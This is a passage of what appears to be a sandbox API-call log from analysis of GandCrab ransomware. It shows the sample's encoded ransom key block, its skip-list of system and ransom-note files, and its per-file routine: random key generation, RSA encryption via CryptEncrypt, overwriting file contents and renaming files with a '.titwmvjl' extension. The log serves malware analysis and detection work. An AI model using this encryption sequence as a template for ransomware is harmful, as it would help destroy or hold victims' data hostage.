64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.039] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0073.040] CloseHandle (hObject=0x2c4) returned 1 [0073.040] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.041] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.041] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x166)) [0073.041] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.041] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.041] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.041] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 126 [0073.041] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0073.042] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.042] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.042] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 102 [0073.042] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0073.042] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0073.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.042] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.043] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.043] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.043] lstrcmpW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2=".") returned 1 [0073.043] lstrcmpW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="..") returned 1 [0073.043] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="04cd465a-248d-4abd-853a-5cb67fe43510" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510" [0073.043] lstrlenW (lpString=".titwmvjl") returned 9 [0073.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned 138 [0073.043] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.043] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510.titwmvjl") returned 147 [0073.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned 138 [0073.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned 138 [0073.043] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned 138 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="desktop.ini") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="autorun.inf") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="ntuser.dat") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="iconcache.db") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="bootsect.bak") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="boot.ini") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="ntuser.dat.log") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="thumbs.db") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="KRAB-DECRYPT.html") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="CRAB-DECRYPT.html") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="ntldr") returned -1 [0073.043] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="NTDETECT.COM") returned -1 [0073.044] lstrcmpiW (lpString1="04cd465a-248d-4abd-853a-5cb67fe43510", lpString2="Bootfont.bin") returned -1 [0073.044] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510") returned 138 [0073.044] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.044] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.045] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.045] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.045] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.045] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.046] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.046] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.046] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.046] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.046] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.047] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.047] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.047] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.047] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.047] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.047] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.048] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.048] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0073.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.049] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.049] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.049] GetLastError () returned 0x0 [0073.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.049] CryptDestroyKey (hKey=0x503938) returned 1 [0073.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.050] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.050] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.051] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5036f8) returned 1 [0073.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.051] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.051] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.051] GetLastError () returned 0x0 [0073.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.052] CryptDestroyKey (hKey=0x5036f8) returned 1 [0073.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.052] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.052] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.052] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.052] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.059] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.059] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.060] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.060] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.062] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.066] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.066] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.066] CloseHandle (hObject=0x2cc) returned 1 [0073.068] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\04cd465a-248d-4abd-853a-5cb67fe43510.titwmvjl"), dwFlags=0x1) returned 1 [0073.068] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.069] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.069] lstrcmpW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2=".") returned 1 [0073.069] lstrcmpW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="..") returned 1 [0073.069] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="15d22704-736b-416f-a36b-857f2a5d2a7e" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e" [0073.069] lstrlenW (lpString=".titwmvjl") returned 9 [0073.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned 138 [0073.069] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.069] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e.titwmvjl") returned 147 [0073.069] lstrlenW 